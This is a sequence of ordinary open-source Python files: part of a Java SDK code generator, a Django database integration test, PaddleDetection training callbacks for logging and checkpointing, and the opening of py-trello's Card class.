w.out('value = %s.%s;', j.java_class(data_type), j.field_static_instance(field))
else:
w.out('%s fieldValue = null;', j.java_class(field_dt, boxed=True, generics=True))
with w.conditional_block(is_nullable_type(field.data_type),
'if (p.getCurrentToken() != JsonToken.END_OBJECT)'):
field_serializer = w.java_serializer(field_dt)
if j.is_collapsible(field_dt) or is_nullable_type(field_dt) and j.is_collapsible(
field_dt.data_type):
w.out('fieldValue = %s.deserialize(p, true);', field_serializer)
else:
w.out('expectField("%s", p);', field.name)
w.out('fieldValue = %s.deserialize(p);', field_serializer)
if is_nullable_type(field.data_type):
with w.block('if (fieldValue == null)'):
w.out('value = %s.%s();', j.java_class(data_type), j.field_factory_method(field))
with w.block('else'):
w.out('value = %s.%s(fieldValue);', j.java_class(data_type),
j.field_factory_method(field))
else:
w.out('value = %s.%s(fieldValue);', j.java_class(data_type), j.field_factory_method(field))
with w.block('else'):
if data_type.catch_all_field:
w.out('value = %s.%s;', j.java_class(data_type), j.field_static_instance(data_type.catch_all_field))
else:
w.out('throw new JsonParseException(p, "Unknown tag: " + tag);')
with w.block('if (!collapsed)'):
w.out('skipFields(p);')
w.out('expectEndObject(p);')
w.out('return value;')
def generate_data_type_validation(self, data_type, value_name, description=None, omit_arg_name=False, level=0):
assert isinstance(data_type, DataType), repr(data_type)
w = self.w
j = self.j
if omit_arg_name:
description = ""
else:
description = description or (" '%s'" % value_name)
if is_list_type(data_type):
if data_type.min_items is not None:
java_value = w.java_value(Int32(), data_type.min_items)
with w.block('if (%s.size() < %s)', value_name, java_value):
w.out('throw new IllegalArgumentException("List%s has fewer than %s items");',
description, java_value)
if data_type.max_items is not None:
java_value = w.java_value(Int32(), data_type.max_items)
with w.block('if (%s.size() > %s)', value_name, java_value):
w.out('throw new IllegalArgumentException("List%s has more than %s items");',
description, java_value)
xn = 'x' if level == 0 else 'x%d' % level
list_item_type = j.java_class(data_type.data_type, boxed=True, generics=True)
with w.block('for (%s %s : %s)', list_item_type, xn, value_name):
with w.block('if (%s == null)', xn):
w.out('throw new IllegalArgumentException("An item in list%s is null");', description)
self.generate_data_type_validation(data_type.data_type, xn, 'an item in list%s' % description,
level=level + 1)
elif is_map_type(data_type):
xn = 'x' if level == 0 else 'x%d' % level
map_item_type = j.java_class(data_type.value_data_type, boxed=True, generics=True)
with w.block('for (%s %s : %s.values())', map_item_type, xn, value_name):
with w.block('if (%s == null)', xn):
w.out('throw new IllegalArgumentException("An item in map%s is null");', description)
self.generate_data_type_validation(data_type.value_data_type, xn, 'an item in map%s' % description,
level=level + 1)
elif is_numeric_type(data_type):
if data_type.min_value is not None:
java_value = w.java_value(data_type, data_type.min_value)
with w.block('if (%s < %s)', value_name, java_value):
w.out('throw new IllegalArgumentException("Number%s is smaller than %s");',
description, java_value)
if data_type.max_value is not None:
java_value = w.java_value(data_type, data_type.max_value)
with w.block('if (%s > %s)', value_name, java_value):
w.out('throw new IllegalArgumentException("Number%s is larger than %s");',
description, java_value)
elif is_string_type(data_type):
if data_type.min_length is not None:
java_value = w.java_value(Int32(), data_type.min_length)
with w.block('if (%s.length() < %s)', value_name, java_value):
w.out('throw new IllegalArgumentException("String%s is shorter than %s");',
description, java_value)
if data_type.max_length is not None:
java_value = w.java_value(Int32(), data_type.max_length)
with w.block('if (%s.length() > %s)', value_name, java_value):
w.out('throw new IllegalArgumentException("String%s is longer than %s");',
description, java_value)
if data_type.pattern is not None:
# TODO: Save the pattern as a static variable.
# NOTE: pattern should match against entire input sequence
pattern_class = JavaClass("java.util.regex.Pattern")
pattern = sanitize_pattern(data_type.pattern)
with w.block('if (!%s.matches("%s", %s))', pattern_class, pattern, value_name):
w.out('throw new IllegalArgumentException("String%s does not match pattern");', description)
elif any((
is_composite_type(data_type),
is_boolean_type(data_type),
is_timestamp_type(data_type),
is_bytes_type(data_type),
)):
pass # Nothing to do for these
else:
raise AssertionError(repr(data_type))
def generate_to_string(self, data_type):
assert is_user_defined_type(data_type), repr(data_type)
w = self.w
w.out('')
w.out('@Override')
with w.block('public String toString()'):
w.out('return Serializer.INSTANCE.serialize(this, false);')
w.out('')
w.javadoc(
"""
Returns a String representation of this object formatted for easier readability.
The returned String may contain newlines.
""",
returns="Formatted, multiline String representation of this object"
)
with w.block('public String toStringMultiline()'):
w.out('return Serializer.INSTANCE.serialize(this, true);')
def generate_hash_code(self, data_type):
assert isinstance(data_type, DataType), repr(data_type)
assert is_user_defined_type(data_type), repr(data_type)
w = self.w
j = self.j
assert not j.is_enum(data_type), "enum types don't require equals() methods"
if is_struct_type(data_type):
fields = [j.param_name(f) for f in data_type.fields]
else:
fields = ['_tag'] + [j.param_name(f) for f in data_type.all_fields if j.has_value(f)]
w.out('')
w.out('@Override')
with w.block('public int hashCode()'):
if not fields:
w.out('// attempt to deal with inheritance')
w.out('return getClass().toString().hashCode();')
else:
arrays_class = JavaClass('java.util.Arrays')
with w.block('int hash = %s.hashCode(new Object []', arrays_class, after=');'):
self.g.generate_multiline_list(fields, delim=('', ''))
if data_type.parent_type:
w.out('hash = (31 * super.hashCode()) + hash;')
w.out('return hash;')
def _java_eq(self, field, name=None):
assert isinstance(field, Field), repr(field)
j = self.j
name = name or j.param_name(field)
if j.is_java_primitive(field.data_type):
return 'this.%(f)s == other.%(f)s' % dict(f=name)
elif not is_nullable_type(field.data_type):
return '(this.%(f)s == other.%(f)s) || (this.%(f)s.equals(other.%(f)s))' % dict(f=name)
else:
return '(this.%(f)s == other.%(f)s) || (this.%(f)s != null && this.%(f)s.equals(other.%(f)s))' % dict(
f=name)
def generate_equals(self, data_type):
assert isinstance(data_type, DataType), repr(data_type)
assert is_user_defined_type(data_type), repr(data_type)
if is_struct_type(data_type):
self.generate_struct_equals(data_type)
else:
self.generate_union_equals(data_type)
def generate_union_equals(self, data_type):
assert is_union_type(data_type), repr(data_type)
w = self.w
j = self.j
assert not j.is_enum(data_type), "enum types don't require equals() methods"
w.out('')
w.out('@Override')
with w.block('public boolean equals(Object obj)'):
with w.block('if (obj == this)'):
w.out('return true;')
with w.block('if (obj == null)'):
w.out('return false;')
with w.block('else if (obj instanceof %s)', j.java_class(data_type)):
w.out('%s other = (%s) obj;', j.java_class(data_type), j.java_class(data_type))
with w.block('if (this._tag != other._tag)'):
w.out('return false;')
with w.block('switch (_tag)'):
for field in data_type.all_fields:
w.out('case %s:', j.field_tag_enum_name(field))
with self.g.indent():
if j.has_value(field):
w.out('return %s;', self._java_eq(field))
else:
w.out('return true;')
w.out('default:')
with self.g.indent():
w.out('return false;')
with w.block('else'):
w.out('return false;')
def generate_struct_equals(self, data_type):
assert is_struct_type(data_type), repr(data_type)
w = self.w
j = self.j
w.out('')
w.out('@Override')
with w.block('public boolean equals(Object obj)'):
with w.block('if (obj == this)'):
w.out('return true;')
with w.block('if (obj == null)'):
w.out('return false;')
w.out('// be careful with inheritance')
with w.block('else if (obj.getClass().equals(this.getClass()))'):
w.out('%s other = (%s) obj;', j.java_class(data_type), j.java_class(data_type))
if not data_type.all_fields:
w.out('return true;')
elif len(data_type.all_fields) == 1:
w.out('return %s;', self._java_eq(data_type.all_fields[0]))
else:
w.out('return (%s)', self._java_eq(data_type.all_fields[0]))
with self.g.indent():
for field in data_type.all_fields[1:]:
w.out('&& (%s)', self._java_eq(field))
w.out(';')
with w.block('else'):
w.out('return false;')
# TODO: Add all Java reserved words.
_RESERVED_KEYWORDS = {
'Enum',
'Iterable',
'Object',
'abstract',
'assert',
'boolean',
'break',
'byte',
'case',
'catch',
'char',
'class',
'const',
'continue',
'default',
'do',
'double',
'else',
'enum',
'extends',
'false',
'final',
'finally',
'float',
'for',
'goto',
'if',
'int',
'interface',
'long',
'native',
'new',
'null',
'package',
'private',
'protected',
'public',
'return',
'short',
'static',
'strictfp',
'super',
'switch',
'synchronized',
'this',
'throw',
'throws',
'transient',
'true',
'try',
'void',
'volatile',
'while',
}
_TYPE_MAP_UNBOXED = {
'UInt64': 'long',
'Int64': 'long',
'UInt32': 'long',
'Int32': 'int',
'Float64': 'double',
'Float32': 'float',
'Boolean': 'boolean',
'Bytes': 'byte[]',
'String': 'String',
'Timestamp': 'java.util.Date',
'Void': 'void',
'List': 'java.util.List',
'Map': 'java.util.Map',
}
_TYPE_MAP_BOXED = {
'UInt64': 'Long',
'Int64': 'Long',
'UInt32': 'Long',
'Int32': 'Integer',
'Float64': 'Double',
'Float32': 'Float',
'Boolean': 'Boolean',
'Bytes': 'byte[]',
'String': 'String',
'Timestamp': 'java.util.Date',
'Void': 'Void',
'List': 'java.util.List',
'Map': 'java.util.Map',
}
_CATCH_ALL_DOC = """
Catch-all used for unknown tag values returned by the Dropbox servers.
Receiving a catch-all value typically indicates this SDK version is not up to
date. Consider updating your SDK version to handle the new tags.
"""
|
09a7c689129cc95b73bb5421a131c5110374d9df
|
c530897cb72b6943c7226b25824444cad5f3503b
|
/usaspending_api/broker/tests/integration/test_broker_integration.py
|
79490760e4f77ec4c4049262881c1b9492d586e3
|
[
"CC0-1.0"
] |
permissive
|
fedspendingtransparency/usaspending-api
|
fc63a22d32ea0207b7273d3e1ef26ba9dbabc42a
|
38f920438697930ae3ac57bbcaae9034877d8fb7
|
refs/heads/master
| 2023-09-01T22:00:36.633612
| 2023-08-29T18:39:18
| 2023-08-29T18:39:18
| 65,394,827
| 276
| 118
|
CC0-1.0
| 2023-09-14T20:33:15
| 2016-08-10T15:39:45
|
Python
|
UTF-8
|
Python
| false
| false
| 4,595
|
py
|
test_broker_integration.py
|
import pytest
from django.conf import settings
from django.db import connections, DEFAULT_DB_ALIAS
from django.test import TestCase
class BrokerIntegrationTestCase(TestCase):
databases = {"default", "data_broker"}
dummy_table_name = "dummy_broker_table_to_be_rolled_back"
@classmethod
def setUpClass(cls):
pass
@classmethod
def tearDownClass(cls):
# Follow-up of test_broker_transactional_test
with connections["data_broker"].cursor() as cursor:
cursor.execute("select * from pg_tables where tablename = '{}'".format(cls.dummy_table_name))
results = cursor.fetchall()
assert results is not None
if len(results) != 0:
pytest.fail(
"Test test_broker_transactional_test did not run transactionally. "
"Creation of table {} in Broker DB was not rolled back and still exists.".format(cls.dummy_table_name)
)
@pytest.mark.usefixtures("broker_db_setup")
def test_can_connect_to_broker(self):
"""Simple 'integration test' that checks a Broker DB exists to integrate with"""
connection = connections["data_broker"]
with connection.cursor() as cursor:
cursor.execute("SELECT now()")
results = cursor.fetchall()
assert results is not None
assert len(str(results[0][0])) > 0
@pytest.mark.usefixtures("broker_db_setup")
def test_broker_transactional_test(self):
"""Integration test that checks whether Django's default transactional test implementation works against the
integrated Broker DB too.
The test creates a dummy table during its execution. If transactional wrapper is working, that table creation
will be rolled-back after the test completes. This not verified until the ~``tearDownClass`` method runs.
NOTE: The transaction is only controlled and will only roll-back if you use Django's django.db.connections
dictionary to get the connection.
"""
dummy_contents = "dummy_text"
# Make sure the table and the data get in there
connection = connections["data_broker"]
with connection.cursor() as cursor:
cursor.execute("create table {} (contents text)".format(self.dummy_table_name))
cursor.execute("insert into {} values ('{}')".format(self.dummy_table_name, dummy_contents))
with connection.cursor() as cursor:
cursor.execute("select * from pg_tables where tablename = '{}'".format(self.dummy_table_name))
results = cursor.fetchall()
assert results is not None
assert len(str(results[0][0])) > 0
with connection.cursor() as cursor:
cursor.execute("select * from {}".format(self.dummy_table_name))
results = cursor.fetchall()
assert results is not None
assert str(results[0][0]) == dummy_contents
@pytest.mark.usefixtures("broker_db_setup")
def test_broker_db_fully_setup(self):
"""Simple 'integration test' that checks a Broker DB had its schema setup"""
connection = connections["data_broker"]
with connection.cursor() as cursor:
cursor.execute("select * from pg_tables where tablename = 'alembic_version'")
results = cursor.fetchall()
assert results is not None
assert len(results) > 0
assert len(str(results[0][0])) > 0
def test_can_connect_to_broker_by_dblink(broker_server_dblink_setup, db):
"""Simple 'integration test' that checks the USAspending to Broker dblink works
It will be skipped if a broker foreign data wrapper is not created in the USAspending database-under-test
"""
connection = connections[DEFAULT_DB_ALIAS]
with connection.cursor() as cursor:
cursor.execute(f"select srvname from pg_foreign_server where srvname = '{settings.DATA_BROKER_DBLINK_NAME}'")
results = cursor.fetchall()
if not results or not results[0][0] == settings.DATA_BROKER_DBLINK_NAME:
pytest.skip(
f"No foreign server named '{settings.DATA_BROKER_DBLINK_NAME}' has been setup on this "
"USAspending database. Skipping the test of integration with that server via dblink"
)
cursor.execute(
f"SELECT * FROM dblink('{settings.DATA_BROKER_DBLINK_NAME}','SELECT now()') "
"AS broker_time(the_now timestamp)"
)
results = cursor.fetchall()
assert results is not None
assert len(results) > 0
assert len(str(results[0][0])) > 0
|
803ba38f89a1ed0ee99381cd809d49bfaaf8135b
|
bf8d344b17e2ff9b7e38ad9597d5ce0e3d4da062
|
/ppdet/engine/callbacks.py
|
1f2d546d86e9473c5dd6b7fd15068c940006dab5
|
[
"Apache-2.0"
] |
permissive
|
PaddlePaddle/PaddleDetection
|
e7e0f40bef75a4e0b6dcbacfafa7eb1969e44961
|
bd83b98342b0a6bc8d8dcd5936233aeda1e32167
|
refs/heads/release/2.6
| 2023-08-31T07:04:15.357051
| 2023-08-18T02:24:45
| 2023-08-18T02:24:45
| 217,475,193
| 12,523
| 3,096
|
Apache-2.0
| 2023-09-10T10:05:56
| 2019-10-25T07:21:14
|
Python
|
UTF-8
|
Python
| false
| false
| 21,592
|
py
|
callbacks.py
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import sys
import datetime
import six
import copy
import json
import paddle
import paddle.distributed as dist
from ppdet.utils.checkpoint import save_model
from ppdet.metrics import get_infer_results
from ppdet.utils.logger import setup_logger
logger = setup_logger('ppdet.engine')
__all__ = [
'Callback', 'ComposeCallback', 'LogPrinter', 'Checkpointer',
'VisualDLWriter', 'SniperProposalsGenerator'
]
class Callback(object):
def __init__(self, model):
self.model = model
def on_step_begin(self, status):
pass
def on_step_end(self, status):
pass
def on_epoch_begin(self, status):
pass
def on_epoch_end(self, status):
pass
def on_train_begin(self, status):
pass
def on_train_end(self, status):
pass
class ComposeCallback(object):
def __init__(self, callbacks):
callbacks = [c for c in list(callbacks) if c is not None]
for c in callbacks:
assert isinstance(
c, Callback), "callback should be subclass of Callback"
self._callbacks = callbacks
def on_step_begin(self, status):
for c in self._callbacks:
c.on_step_begin(status)
def on_step_end(self, status):
for c in self._callbacks:
c.on_step_end(status)
def on_epoch_begin(self, status):
for c in self._callbacks:
c.on_epoch_begin(status)
def on_epoch_end(self, status):
for c in self._callbacks:
c.on_epoch_end(status)
def on_train_begin(self, status):
for c in self._callbacks:
c.on_train_begin(status)
def on_train_end(self, status):
for c in self._callbacks:
c.on_train_end(status)
class LogPrinter(Callback):
def __init__(self, model):
super(LogPrinter, self).__init__(model)
def on_step_end(self, status):
if dist.get_world_size() < 2 or dist.get_rank() == 0:
mode = status['mode']
if mode == 'train':
epoch_id = status['epoch_id']
step_id = status['step_id']
steps_per_epoch = status['steps_per_epoch']
training_staus = status['training_staus']
batch_time = status['batch_time']
data_time = status['data_time']
epoches = self.model.cfg.epoch
batch_size = self.model.cfg['{}Reader'.format(mode.capitalize(
))]['batch_size']
logs = training_staus.log()
space_fmt = ':' + str(len(str(steps_per_epoch))) + 'd'
if step_id % self.model.cfg.log_iter == 0:
eta_steps = (epoches - epoch_id) * steps_per_epoch - step_id
eta_sec = eta_steps * batch_time.global_avg
eta_str = str(datetime.timedelta(seconds=int(eta_sec)))
ips = float(batch_size) / batch_time.avg
fmt = ' '.join([
'Epoch: [{}]',
'[{' + space_fmt + '}/{}]',
'learning_rate: {lr:.6f}',
'{meters}',
'eta: {eta}',
'batch_cost: {btime}',
'data_cost: {dtime}',
'ips: {ips:.4f} images/s',
])
fmt = fmt.format(
epoch_id,
step_id,
steps_per_epoch,
lr=status['learning_rate'],
meters=logs,
eta=eta_str,
btime=str(batch_time),
dtime=str(data_time),
ips=ips)
logger.info(fmt)
if mode == 'eval':
step_id = status['step_id']
if step_id % 100 == 0:
logger.info("Eval iter: {}".format(step_id))
def on_epoch_end(self, status):
if dist.get_world_size() < 2 or dist.get_rank() == 0:
mode = status['mode']
if mode == 'eval':
sample_num = status['sample_num']
cost_time = status['cost_time']
logger.info('Total sample number: {}, average FPS: {}'.format(
sample_num, sample_num / cost_time))
class Checkpointer(Callback):
def __init__(self, model):
super(Checkpointer, self).__init__(model)
self.best_ap = -1000.
self.save_dir = os.path.join(self.model.cfg.save_dir,
self.model.cfg.filename)
if hasattr(self.model.model, 'student_model'):
self.weight = self.model.model.student_model
else:
self.weight = self.model.model
def on_epoch_end(self, status):
# Checkpointer only performed during training
mode = status['mode']
epoch_id = status['epoch_id']
weight = None
save_name = None
if dist.get_world_size() < 2 or dist.get_rank() == 0:
if mode == 'train':
end_epoch = self.model.cfg.epoch
if (
epoch_id + 1
) % self.model.cfg.snapshot_epoch == 0 or epoch_id == end_epoch - 1:
save_name = str(
epoch_id) if epoch_id != end_epoch - 1 else "model_final"
weight = self.weight.state_dict()
elif mode == 'eval':
if 'save_best_model' in status and status['save_best_model']:
for metric in self.model._metrics:
map_res = metric.get_results()
eval_func = "ap"
if 'pose3d' in map_res:
key = 'pose3d'
eval_func = "mpjpe"
elif 'bbox' in map_res:
key = 'bbox'
elif 'keypoint' in map_res:
key = 'keypoint'
else:
key = 'mask'
if key not in map_res:
logger.warning("Evaluation results empty, this may be due to " \
"training iterations being too few or not " \
"loading the correct weights.")
return
if map_res[key][0] >= self.best_ap:
self.best_ap = map_res[key][0]
save_name = 'best_model'
weight = self.weight.state_dict()
logger.info("Best test {} {} is {:0.3f}.".format(
key, eval_func, abs(self.best_ap)))
if weight:
if self.model.use_ema:
exchange_save_model = status.get('exchange_save_model',
False)
if not exchange_save_model:
# save model and ema_model
save_model(
status['weight'],
self.model.optimizer,
self.save_dir,
save_name,
epoch_id + 1,
ema_model=weight)
else:
# save model(student model) and ema_model(teacher model)
# in DenseTeacher SSOD, the teacher model will be higher,
# so exchange when saving pdparams
student_model = status['weight'] # model
teacher_model = weight # ema_model
save_model(
teacher_model,
self.model.optimizer,
self.save_dir,
save_name,
epoch_id + 1,
ema_model=student_model)
del teacher_model
del student_model
else:
save_model(weight, self.model.optimizer, self.save_dir,
save_name, epoch_id + 1)
class WiferFaceEval(Callback):
def __init__(self, model):
super(WiferFaceEval, self).__init__(model)
def on_epoch_begin(self, status):
assert self.model.mode == 'eval', \
"WiferFaceEval can only be set during evaluation"
for metric in self.model._metrics:
metric.update(self.model.model)
sys.exit()
class VisualDLWriter(Callback):
"""
Use VisualDL to log data or image
"""
def __init__(self, model):
super(VisualDLWriter, self).__init__(model)
assert six.PY3, "VisualDL requires Python >= 3.5"
try:
from visualdl import LogWriter
except Exception as e:
logger.error('visualdl not found, plaese install visualdl. '
'for example: `pip install visualdl`.')
raise e
self.vdl_writer = LogWriter(
model.cfg.get('vdl_log_dir', 'vdl_log_dir/scalar'))
self.vdl_loss_step = 0
self.vdl_mAP_step = 0
self.vdl_image_step = 0
self.vdl_image_frame = 0
def on_step_end(self, status):
mode = status['mode']
if dist.get_world_size() < 2 or dist.get_rank() == 0:
if mode == 'train':
training_staus = status['training_staus']
for loss_name, loss_value in training_staus.get().items():
self.vdl_writer.add_scalar(loss_name, loss_value,
self.vdl_loss_step)
self.vdl_loss_step += 1
elif mode == 'test':
ori_image = status['original_image']
result_image = status['result_image']
self.vdl_writer.add_image(
"original/frame_{}".format(self.vdl_image_frame), ori_image,
self.vdl_image_step)
self.vdl_writer.add_image(
"result/frame_{}".format(self.vdl_image_frame),
result_image, self.vdl_image_step)
self.vdl_image_step += 1
# each frame can display ten pictures at most.
if self.vdl_image_step % 10 == 0:
self.vdl_image_step = 0
self.vdl_image_frame += 1
def on_epoch_end(self, status):
mode = status['mode']
if dist.get_world_size() < 2 or dist.get_rank() == 0:
if mode == 'eval':
for metric in self.model._metrics:
for key, map_value in metric.get_results().items():
self.vdl_writer.add_scalar("{}-mAP".format(key),
map_value[0],
self.vdl_mAP_step)
self.vdl_mAP_step += 1
class WandbCallback(Callback):
def __init__(self, model):
super(WandbCallback, self).__init__(model)
try:
import wandb
self.wandb = wandb
except Exception as e:
logger.error('wandb not found, please install wandb. '
'Use: `pip install wandb`.')
raise e
self.wandb_params = model.cfg.get('wandb', None)
self.save_dir = os.path.join(self.model.cfg.save_dir,
self.model.cfg.filename)
if self.wandb_params is None:
self.wandb_params = {}
for k, v in model.cfg.items():
if k.startswith("wandb_"):
self.wandb_params.update({k.lstrip("wandb_"): v})
self._run = None
if dist.get_world_size() < 2 or dist.get_rank() == 0:
_ = self.run
self.run.config.update(self.model.cfg)
self.run.define_metric("epoch")
self.run.define_metric("eval/*", step_metric="epoch")
self.best_ap = -1000.
self.fps = []
@property
def run(self):
if self._run is None:
if self.wandb.run is not None:
logger.info(
"There is an ongoing wandb run which will be used"
"for logging. Please use `wandb.finish()` to end that"
"if the behaviour is not intended")
self._run = self.wandb.run
else:
self._run = self.wandb.init(**self.wandb_params)
return self._run
def save_model(self,
optimizer,
save_dir,
save_name,
last_epoch,
ema_model=None,
ap=None,
fps=None,
tags=None):
if dist.get_world_size() < 2 or dist.get_rank() == 0:
model_path = os.path.join(save_dir, save_name)
metadata = {}
metadata["last_epoch"] = last_epoch
if ap:
metadata["ap"] = ap
if fps:
metadata["fps"] = fps
if ema_model is None:
ema_artifact = self.wandb.Artifact(
name="ema_model-{}".format(self.run.id),
type="model",
metadata=metadata)
model_artifact = self.wandb.Artifact(
name="model-{}".format(self.run.id),
type="model",
metadata=metadata)
ema_artifact.add_file(model_path + ".pdema", name="model_ema")
model_artifact.add_file(model_path + ".pdparams", name="model")
self.run.log_artifact(ema_artifact, aliases=tags)
self.run.log_artfact(model_artifact, aliases=tags)
else:
model_artifact = self.wandb.Artifact(
name="model-{}".format(self.run.id),
type="model",
metadata=metadata)
model_artifact.add_file(model_path + ".pdparams", name="model")
self.run.log_artifact(model_artifact, aliases=tags)
def on_step_end(self, status):
mode = status['mode']
if dist.get_world_size() < 2 or dist.get_rank() == 0:
if mode == 'train':
training_status = status['training_staus'].get()
for k, v in training_status.items():
training_status[k] = float(v)
# calculate ips, data_cost, batch_cost
batch_time = status['batch_time']
data_time = status['data_time']
batch_size = self.model.cfg['{}Reader'.format(mode.capitalize(
))]['batch_size']
ips = float(batch_size) / float(batch_time.avg)
data_cost = float(data_time.avg)
batch_cost = float(batch_time.avg)
metrics = {"train/" + k: v for k, v in training_status.items()}
metrics["train/ips"] = ips
metrics["train/data_cost"] = data_cost
metrics["train/batch_cost"] = batch_cost
self.fps.append(ips)
self.run.log(metrics)
def on_epoch_end(self, status):
mode = status['mode']
epoch_id = status['epoch_id']
save_name = None
if dist.get_world_size() < 2 or dist.get_rank() == 0:
if mode == 'train':
fps = sum(self.fps) / len(self.fps)
self.fps = []
end_epoch = self.model.cfg.epoch
if (
epoch_id + 1
) % self.model.cfg.snapshot_epoch == 0 or epoch_id == end_epoch - 1:
save_name = str(
epoch_id) if epoch_id != end_epoch - 1 else "model_final"
tags = ["latest", "epoch_{}".format(epoch_id)]
self.save_model(
self.model.optimizer,
self.save_dir,
save_name,
epoch_id + 1,
self.model.use_ema,
fps=fps,
tags=tags)
if mode == 'eval':
sample_num = status['sample_num']
cost_time = status['cost_time']
fps = sample_num / cost_time
merged_dict = {}
for metric in self.model._metrics:
for key, map_value in metric.get_results().items():
merged_dict["eval/{}-mAP".format(key)] = map_value[0]
merged_dict["epoch"] = status["epoch_id"]
merged_dict["eval/fps"] = sample_num / cost_time
self.run.log(merged_dict)
if 'save_best_model' in status and status['save_best_model']:
for metric in self.model._metrics:
map_res = metric.get_results()
if 'pose3d' in map_res:
key = 'pose3d'
elif 'bbox' in map_res:
key = 'bbox'
elif 'keypoint' in map_res:
key = 'keypoint'
else:
key = 'mask'
if key not in map_res:
logger.warning("Evaluation results empty, this may be due to " \
"training iterations being too few or not " \
"loading the correct weights.")
return
if map_res[key][0] >= self.best_ap:
self.best_ap = map_res[key][0]
save_name = 'best_model'
tags = ["best", "epoch_{}".format(epoch_id)]
self.save_model(
self.model.optimizer,
self.save_dir,
save_name,
last_epoch=epoch_id + 1,
ema_model=self.model.use_ema,
ap=abs(self.best_ap),
fps=fps,
tags=tags)
def on_train_end(self, status):
self.run.finish()
class SniperProposalsGenerator(Callback):
def __init__(self, model):
super(SniperProposalsGenerator, self).__init__(model)
ori_dataset = self.model.dataset
self.dataset = self._create_new_dataset(ori_dataset)
self.loader = self.model.loader
self.cfg = self.model.cfg
self.infer_model = self.model.model
def _create_new_dataset(self, ori_dataset):
dataset = copy.deepcopy(ori_dataset)
# init anno_cropper
dataset.init_anno_cropper()
# generate infer roidbs
ori_roidbs = dataset.get_ori_roidbs()
roidbs = dataset.anno_cropper.crop_infer_anno_records(ori_roidbs)
# set new roidbs
dataset.set_roidbs(roidbs)
return dataset
def _eval_with_loader(self, loader):
results = []
with paddle.no_grad():
self.infer_model.eval()
for step_id, data in enumerate(loader):
outs = self.infer_model(data)
for key in ['im_shape', 'scale_factor', 'im_id']:
outs[key] = data[key]
for key, value in outs.items():
if hasattr(value, 'numpy'):
outs[key] = value.numpy()
results.append(outs)
return results
def on_train_end(self, status):
self.loader.dataset = self.dataset
results = self._eval_with_loader(self.loader)
results = self.dataset.anno_cropper.aggregate_chips_detections(results)
# sniper
proposals = []
clsid2catid = {v: k for k, v in self.dataset.catid2clsid.items()}
for outs in results:
batch_res = get_infer_results(outs, clsid2catid)
start = 0
for i, im_id in enumerate(outs['im_id']):
bbox_num = outs['bbox_num']
end = start + bbox_num[i]
bbox_res = batch_res['bbox'][start:end] \
if 'bbox' in batch_res else None
if bbox_res:
proposals += bbox_res
logger.info("save proposals in {}".format(self.cfg.proposals_path))
with open(self.cfg.proposals_path, 'w') as f:
json.dump(proposals, f)
|
7334faf0a81b5569092e939433542d680d2f415b
|
a526b24dcce8d802db6ad0cd387a64bd73e5f46a
|
/trello/card.py
|
c69a77d86b0faa31f1f938af03b99e1136f6036b
|
[] |
permissive
|
sarumont/py-trello
|
f430b4e8379d800739563dbc87ddd73def542a2f
|
a628d545e936ccdab299cb139f56b8f98836618e
|
refs/heads/master
| 2023-08-02T11:41:50.011554
| 2023-01-26T16:47:46
| 2023-01-26T16:47:46
| 3,123,657
| 809
| 344
|
BSD-3-Clause
| 2023-03-13T19:45:00
| 2012-01-07T08:31:17
|
Python
|
UTF-8
|
Python
| false
| false
| 30,264
|
py
|
card.py
|
# -*- coding: utf-8 -*-
from __future__ import with_statement, print_function, absolute_import
import datetime
from operator import itemgetter
import pytz
from dateutil import parser as dateparser
from trello import TrelloBase
from trello.attachments import Attachments
from trello.checklist import Checklist
from trello.compat import force_str
from trello.label import Label
from trello.organization import Organization
from trello.customfield import CustomField, CustomFieldText, CustomFieldCheckbox, CustomFieldNumber, CustomFieldDate, CustomFieldList
class Card(TrelloBase):
"""
Class representing a Trello card. Card attributes are stored on
the object
https://developers.trello.com/advanced-reference/card
"""
@property
def short_url(self):
return self.shortUrl
@property
def member_id(self):
return self.idMembers
@property
def short_id(self):
return self.idShort
@property
def list_id(self):
return self.idList
@property
def board_id(self):
return self.idBoard
@property
def description(self):
return self.desc
@property
def date_last_activity(self):
return self.dateLastActivity
@property
def labels(self):
return self._labels if self._labels else []
@property
def custom_fields(self):
"""
Lazily loads and returns the custom fields
"""
if self.customFields is None:
self.customFields = self.fetch_custom_fields()
return self.customFields
@property
def comments(self):
"""
Lazily loads and returns the comments
"""
if self._comments is None:
self._comments = self.fetch_comments()
return self._comments
@property
def checklists(self):
"""
Lazily loads and returns the checklists
"""
if self._checklists is None:
self._checklists = self.fetch_checklists()
return self._checklists
@property
def plugin_data(self):
"""
Lazily loads and returns the plugin data
"""
if self._plugin_data is None:
self._plugin_data = self.fetch_plugin_data()
return self._plugin_data
@property
def attachments(self):
"""
Lazily loads and returns the attachments
"""
if self._attachments is None:
self._attachments = self.fetch_attachments()
return self._attachments
def __init__(self, parent, card_id, name=''):
"""
:parent: reference to the parent trello list
:card_id: ID for this card
"""
super(Card, self).__init__()
if isinstance(parent, List):
self.trello_list = parent
self.board = parent.board
else:
self.board = parent
self.client = parent.client
self.id = card_id
self.name = name
self.customFields = None
self._checklists = None
self._comments = None
self._plugin_data = None
self._attachments = None
self._labels = None
self._json_obj = None
@classmethod
def from_json(cls, parent, json_obj):
"""
Deserialize the card json object to a Card object
:parent: the list object that the card belongs to
:json_obj: json object
:rtype: Card
"""
if 'id' not in json_obj:
raise Exception("key 'id' is not in json_obj")
card = cls(parent,
json_obj['id'],
name=json_obj['name'])
card._json_obj = json_obj
card.desc = json_obj.get('desc', '')
card.due = json_obj.get('due', '')
card.is_due_complete = json_obj['dueComplete']
card.closed = json_obj['closed']
card.url = json_obj['url']
card.pos = json_obj['pos']
card.shortUrl = json_obj['shortUrl']
card.idMembers = json_obj['idMembers']
card.member_ids = json_obj['idMembers']
card.idLabels = json_obj['idLabels']
card.idBoard = json_obj['idBoard']
card.idList = json_obj['idList']
card.idShort = json_obj['idShort']
card.badges = json_obj['badges']
card.customFields = card.fetch_custom_fields(json_obj=json_obj)
card.countCheckItems = json_obj['badges']['checkItems']
card.countCheckLists = len(json_obj['idChecklists'])
card._labels = Label.from_json_list(card.board, json_obj['labels'])
